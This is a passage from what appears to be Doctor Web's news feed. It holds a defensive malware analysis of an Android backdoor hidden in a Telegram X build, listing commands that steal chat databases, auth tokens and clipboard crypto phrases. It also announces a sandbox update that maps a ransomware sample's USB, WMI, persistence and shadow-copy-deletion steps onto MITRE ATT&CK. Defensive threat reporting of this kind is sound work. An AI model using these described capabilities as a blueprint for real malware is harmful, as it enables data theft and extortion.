To receive commands via Redis, Android.Backdoor.Baohuo.1.origin connects to the attackers’ corresponding server where it registers its own sub-channel. Threat actors connect to this sub-channel and post tasks in it, which the backdoor then executes. The malicious program can receive the following commands:

create a blacklist of chats that will not be displayed in the Telegram X window;
conceal specified devices from the user in the list of authorized devices for their account;
block notifications from blacklisted chats for a specified time;
display a window with information about the Telegram X messenger update (when the user clicks it, they are redirected to a target website);
send the C2 server information about all of the installed apps;
terminate the user’s current authorized Telegram login session on the infected device;
display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);
remove the Telegram Premium icon in the app’s interface for the current user;
upload to the C2 server information from the Telegram X databases that store chat history, messages, and other confidential data;
subscribe the user to a specified Telegram channel;
leave a specified Telegram channel;
join a specified Telegram channel on behalf of the user, using the provided URL;
obtain the list of devices authorized in Telegram;
request the user’s authentication token and upload it to the C2 server.

It should be noted that hijacking data from the clipboard (when the user minimizes the messenger and restores its window) allows various scenarios for stealing confidential data to be implemented. For example, the victim can copy the password or mnemonic phrase used to access their crypto wallet, copy text from some important document to send it to business partners, etc. The trojan will intercept this information from the clipboard and send it to the malicious actors.

Dr.Web Security Space for mobile devices successfully detects and deletes all known versions of Android.Backdoor.Baohuo.1.origin, so this malware does not pose a threat to our users.

More details about Android.Backdoor.Baohuo.1.origin
Indicators of compromise

Get structured information about targeted attacks: Dr.Web vxCube reports merged with the MITRE ATT&CK matrix

Wed, 22 Oct 2025 14:23:09 GMT

Doctor Web is updating Dr.Web vxCube. The upcoming release will allow the sandbox's reports to be linked with the MITRE ATT&CK Enterprise matrix. As a result, analysis results will be integrated into the knowledge base of adversarial tactics and techniques to provide researchers with a more accurate assessment of samples being examined and allow them to recreate the attack timeline. The MITRE ATT&CK framework contains information about threat actors’ tactics and techniques. Cybersecurity experts use the knowledge base to further enhance the security of IT infrastructures.

This latest Dr.Web vxCube version won't merely provide researchers with a report on the activity of a potential threat but will also help them determine the sequence of steps taken to penetrate and infect a system. This information may subsequently be used to understand how current security policies should be changed to tighten security. Furthermore, the data on identified tactics and techniques can help create new SOC and SIEM rules for neutralising a specific threat.

To better demonstrate how information security professionals will benefit from the upcoming update, let’s examine the report generated after a common encryption ransomware sample was analysed with the new Dr.Web vxCube version.

Tactics: Initial Access
Technique: Replication Through Removable Media
The attacker downloaded the malware to a removable data storage device that became the source of the infection. Perhaps, the employee used their own infected USB stick.
Tactics: Execution
Technique: Windows Management Instrumentation (WMI)
As soon as the flash drive gets connected to a computer, the autorun routine is triggered (for example, a modified autorun.inf file could be used for this). The encryption ransomware uses WMI to activate its payload. It employs a legitimate administration tool (WMI) to evade detection by less advanced antiviruses.
Tactics: Persistence & Privilege Escalation
Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
To persist after a system restart and gain control as soon as a user logs in, the ransomware adds itself to the autostart app list. To accomplish this, it creates a corresponding registry entry or copies itself into the autostart folder. At this step, the trojan is often able to elevate its privileges to match those of the current user account.
Tactics: Defense Evasion
Technique: Indicator Removal: File deletion
Once the ransomware has gained a foothold in the system, it starts covering its tracks. It removes its original executable file from the USB stick or the temporary folder to make it harder for antivirus experts to detect and analyze it.
Tactics: Lateral Movement
Technique: Replication Through Removable Media
The malicious program does not confine itself to operating on a single compromised device. It monitors the system to determine when other USB drives get connected and infects them as well. Now, if an employee takes away their flash drive and connects it to another computer, the attack will be repeated. This is how the ransomware traverses air gaps within an infrastructure.
Tactics: Impact
Techniques: Inhibit System Recovery и Data Encrypted for Impact
Inhibit System Recovery: the ransomware attempts to destroy or encrypt point-in-time file copies created by the Volume Shadow Copy Service (VSS) to prevent the victim from recovering their data by using standard Windows tools.
Data Encrypted for Impact: the malware uses strong encryption algorithms to encrypt all important files (documents, photos, database files) on the computer. After that, a message appears on the screen demanding that a ransom be paid in exchange for the decryption key.

A cybersecurity professional can use this information to implement the following measures in order to prevent systems from getting compromised by similar malicious programs:

Impose tighter restrictions on the use of USB storage media (disable the autorun feature, only allow encrypted corporate flash drives to be connected to the computers).
Configure system monitoring tools to detect suspicious Run Registry keys and attempts to run malicious scripts with WMI.
Divide the network into multiple subnets to mitigate a threat’s ability to spread across the infrastructure.
Set up regular and secure data backups to ensure that a recovery option is always available.

The new feature is available in both cloud-based and on-premise Dr.Web vxCube versions for Linux and Windows VMs. Only the English language is supported. Doctor Web intends to add MITRE ATT&CK support for Android threat analysis in the future.

The updated Dr.Web vxCube version will also include the current sandbox documentation. The cloud-based version of Dr.Web vxCube will be unavailable on October 23, 2025, between 10.00-11.00 GMT during scheduled updating.

To update the on-premise version, download the latest Dr.Web vxCube distribution and VM images and follow the installation guidelines found in the documentation to reinstall the software. Use the Download Wizard to get the latest Dr.Web vxCube version.

Dr.Web vxCube is a suspicious file analysis sandbox. It can help you identify indicators of compromise, prevent cyberattacks and eliminate advanced persistent threats. The sandbox is available as a cloud-based service and an on-premise solution.

Use this form to receive demo access to the cloud-based version of Dr.Web vxCube.

You can purchase a license for Dr.Web vxCube from Doctor Web's partners.

This update contains the MITRE ATT&CK® knowledge base. The knowledge base is being used and distributed under the MITRE Corporation's license.

The MITRE ATT&CK® Terms of Use are available at https://attack.mitre.org/resources/legal-and-branding/terms-of-use/.